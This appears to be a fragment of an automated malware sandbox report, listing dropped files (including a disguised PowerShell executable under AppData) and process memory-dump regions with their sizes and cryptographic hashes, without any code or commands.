                                                                                                                          • C:\Users\Admin\AppData\Roaming\Windows\$sxr-powershell.exe
                                                                                                                            Filesize

                                                                                                                            409KB

                                                                                                                            MD5

                                                                                                                            c4f70954d48c8653fde31fc63c619fc8

                                                                                                                            SHA1

                                                                                                                            c2fe0bc4eab66f6cbf19ab3a80817eba8084982e

                                                                                                                            SHA256

                                                                                                                            dbc30b002dad39a45fdd36c509d854dc931662235886f01ec149cd8cf904ddb5

                                                                                                                            SHA512

                                                                                                                            1a0db425192d25f1e96ac43a5ae18ff530ef11e2f1526fd6677f4b82b04e212679c347f5647be0d72665e2f587c2824b19d2104c48546eb049ae27fb7470defc

                                                                                                                          • C:\Windows\Temp\__PSScriptPolicyTest_pvy20wko.ap5.ps1
                                                                                                                            Filesize

                                                                                                                            60B

                                                                                                                            MD5

                                                                                                                            d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                            SHA1

                                                                                                                            6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                            SHA256

                                                                                                                            96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                            SHA512

                                                                                                                            5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                          • memory/552-86-0x00007FFD1C610000-0x00007FFD1C620000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/552-85-0x0000024865D60000-0x0000024865D8B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/552-79-0x0000024865D60000-0x0000024865D8B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/652-52-0x000001D356C00000-0x000001D356C2B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/652-53-0x00007FFD1C610000-0x00007FFD1C620000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/652-46-0x000001D356C00000-0x000001D356C2B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/652-45-0x000001D356C00000-0x000001D356C2B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/652-44-0x000001D3569B0000-0x000001D3569D5000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            148KB

                                                                                                                          • memory/708-57-0x0000029A41EB0000-0x0000029A41EDB000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/708-63-0x0000029A41EB0000-0x0000029A41EDB000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/708-64-0x00007FFD1C610000-0x00007FFD1C620000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/768-90-0x0000025772B30000-0x0000025772B5B000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/1012-68-0x000001FA875C0000-0x000001FA875EB000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/1012-74-0x000001FA875C0000-0x000001FA875EB000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            172KB

                                                                                                                          • memory/1012-75-0x00007FFD1C610000-0x00007FFD1C620000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            64KB

                                                                                                                          • memory/2016-34-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/2016-40-0x00007FFD5B3F0000-0x00007FFD5B4AD000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            756KB

                                                                                                                          • memory/2016-33-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/2016-35-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/2016-36-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/2016-38-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/2016-41-0x0000000140000000-0x0000000140008000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            32KB

                                                                                                                          • memory/2016-39-0x00007FFD5C580000-0x00007FFD5C789000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            2.0MB

                                                                                                                          • memory/2524-20-0x0000000074610000-0x0000000074DC1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            7.7MB

                                                                                                                          • memory/2524-6-0x0000000006520000-0x0000000006532000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            72KB

                                                                                                                          • memory/2524-1-0x0000000000BA0000-0x0000000000C0C000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            432KB

                                                                                                                          • memory/2524-2-0x0000000005BF0000-0x0000000006196000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            5.6MB

                                                                                                                          • memory/2524-3-0x00000000056E0000-0x0000000005772000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            584KB

                                                                                                                          • memory/2524-0-0x000000007461E000-0x000000007461F000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            4KB

                                                                                                                          • memory/2524-4-0x0000000074610000-0x0000000074DC1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            7.7MB

                                                                                                                          • memory/2524-5-0x00000000057E0000-0x0000000005846000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            408KB

                                                                                                                          • memory/2524-7-0x0000000006A70000-0x0000000006AAC000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            240KB

                                                                                                                          • memory/4804-698-0x0000000074610000-0x0000000074DC1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            7.7MB

                                                                                                                          • memory/4804-699-0x0000000006CE0000-0x0000000006CEA000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            40KB

                                                                                                                          • memory/4804-13-0x0000000074610000-0x0000000074DC1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            7.7MB

                                                                                                                          • memory/4804-14-0x0000000074610000-0x0000000074DC1000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            7.7MB

                                                                                                                          • memory/4856-32-0x00007FFD5B3F0000-0x00007FFD5B4AD000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            756KB

                                                                                                                          • memory/4856-22-0x000001EADB0F0000-0x000001EADB112000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            136KB

                                                                                                                          • memory/4856-30-0x000001EADB4A0000-0x000001EADB4CA000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            168KB

                                                                                                                          • memory/4856-31-0x00007FFD5C580000-0x00007FFD5C789000-memory.dmp
                                                                                                                            Filesize

                                                                                                                            2.0MB